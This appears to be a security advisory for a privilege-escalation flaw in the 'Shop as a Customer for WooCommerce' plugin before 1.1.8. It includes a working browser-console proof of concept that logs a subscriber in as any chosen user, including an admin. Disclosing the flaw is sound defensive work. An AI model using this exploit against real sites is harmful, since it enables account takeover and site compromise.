Shop as a Customer for WooCommerce < 1.1.8 – Subscriber+ Privilege Escalation

Description

The plugin allows any authenticated users, such as subscriber to be logged in as any user, such as admin

Proof of Concept

Run either of the below commands in the developer console of the web browser while being on the blog as a subscriber user and on the my account page. Replace USER_ID with the ID of the user to log as. Refresh the page to see that you are logged in as the given user.

jQuery.ajax({
    url: ajaxurl,
    type: 'POST',
    dataType: 'json',
    data: {
        action: 'vieworder',
        security: ajax_nonce,
        id: USER_ID
    },
    success: function(response) {
        console.log('Success:', response);
    },
    error: function(jqXHR, textStatus, errorThrown) {
        console.error('Error:', textStatus, errorThrown);
    }
});

jQuery.ajax({
    url: ajaxurl,
    type: 'POST',
    dataType: 'json',
    data: {
        action: 'ajaxxx',
        security: ajax_nonce,
        id: USER_ID
    },
    success: function(response) {
        console.log('Success:', response);
    },
    error: function(jqXHR, textStatus, errorThrown) {
        console.error('Error:', textStatus, errorThrown);
    }
});